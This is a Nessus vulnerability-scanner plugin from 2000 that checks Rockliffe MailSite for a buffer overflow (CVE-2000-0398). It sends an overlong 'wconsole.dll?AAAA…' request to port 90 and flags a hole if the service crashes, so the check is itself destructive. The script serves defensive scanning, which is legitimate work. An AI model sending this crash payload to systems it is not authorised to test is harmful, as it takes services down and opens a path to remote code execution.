#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
# See the Nessus Scripts License for details
#


if(description)
{
 script_id(10421);
 script_version ("$Revision: 1.12.2.1 $");
 script_bugtraq_id(1244);
 script_cve_id("CVE-2000-0398");
 name["english"] = "Rockliffe's MailSite overflow";
 name["francais"] = "Dpassement de buffer dans MailSite de RockLiffe";
 script_name(english:name["english"], francais:name["francais"]);
 
 desc["english"] = "
The remote Rockliffe MailSite is subject to a buffer
overflow when issued the request :

	GET /cgi-bin/wconsole.dll?AAAA....AAAA
	
This may be of some use to an attacker to run arbitrary code
on this system and/or deactivate it.

Solution : Upgrade to version 4.2.2 of this software
Risk factor : High";

 desc["francais"] = "
Le service 'MailSite' distant est vulnrable  un dpassement
de buffer lorsqu'on lui fait la requete :

	GET /cgi-bin/wconsole.dll?AAAA....AAAA
	
Un pirate peut s'en servir pour injecter du code arbitraire
sur ce systme et/ou desactiver ce service.

Solution : Mettez MailSite  jour en version 4.2.2
Facteur de risque : Elev";

 script_description(english:desc["english"], francais:desc["francais"]);
 
 summary["english"] = "MaiLSite buffer overflow";
 summary["francais"] = "Dpassement de buffer dans MaiLSite";
 script_summary(english:summary["english"], francais:summary["francais"]);
 
 script_category(ACT_DESTRUCTIVE_ATTACK);
 
 
 script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison",
		francais:"Ce script est Copyright (C) 2000 Renaud Deraison");
 family["english"] = "Gain root remotely";
 family["francais"] = "Passer root  distance";
 script_family(english:family["english"], francais:family["francais"]);
 script_dependencie("find_service.nes", "www_too_long_url.nasl");
 script_require_ports(90);
 exit(0);
}

#
# The script code starts here
#

include("http_func.inc");

port = 90;

if(get_port_state(port))
{
 if(http_is_dead(port:port))exit(0);
 
 data = string(cgibin(), "/wconsole.dll?", crap(1024));
 data = http_get(item:data, port:port);
 soc = http_open_socket(port);
 if(soc > 0)
 {
  send(socket:soc, data:data);
  r = http_recv(socket:soc);
  http_close_socket(soc);
  
  if(http_is_dead(port:port))security_hole(port);
 }
}
